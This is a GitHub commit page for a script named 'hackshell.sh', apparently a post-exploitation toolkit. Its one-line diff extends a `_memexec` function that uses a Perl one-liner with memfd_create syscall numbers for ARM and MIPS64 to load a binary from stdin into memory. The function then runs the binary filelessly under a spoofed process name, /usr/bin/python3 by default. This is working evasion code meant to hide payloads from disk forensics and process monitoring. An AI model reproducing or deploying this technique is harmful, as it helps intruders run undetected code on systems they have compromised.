Skip to content

Commit 398f19e

Browse files
committed
arm7 + mips64
1 parent 48db561 commit 398f19e

File tree

1 file changed

+1
-1
lines changed

1 file changed

+1
-1
lines changed

hackshell.sh

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -1639,7 +1639,7 @@ _memexec() {
16391639
16401640
_hs_dep perl || return
16411641
shift
1642-
perl '-efor(319,279){($f=syscall$_,$",1)>0&&last};open($o,">&=".$f);print$o(<STDIN>);exec{"/proc/$$/fd/$f"}"'"${name:-/usr/bin/python3}"'",@ARGV' -- "$@"
1642+
perl '-e$^F=255;for(319,279,385,314){($f=syscall$_,$",1)>0&&last};open($o,">&=".$f);print$o(<STDIN>);exec{"/proc/$$/fd/$f"}"'"${name:-/usr/bin/python3}"'",@ARGV' -- "$@"
16431643
return $?
16441644
}
16451645

0 commit comments

Comments
 (0)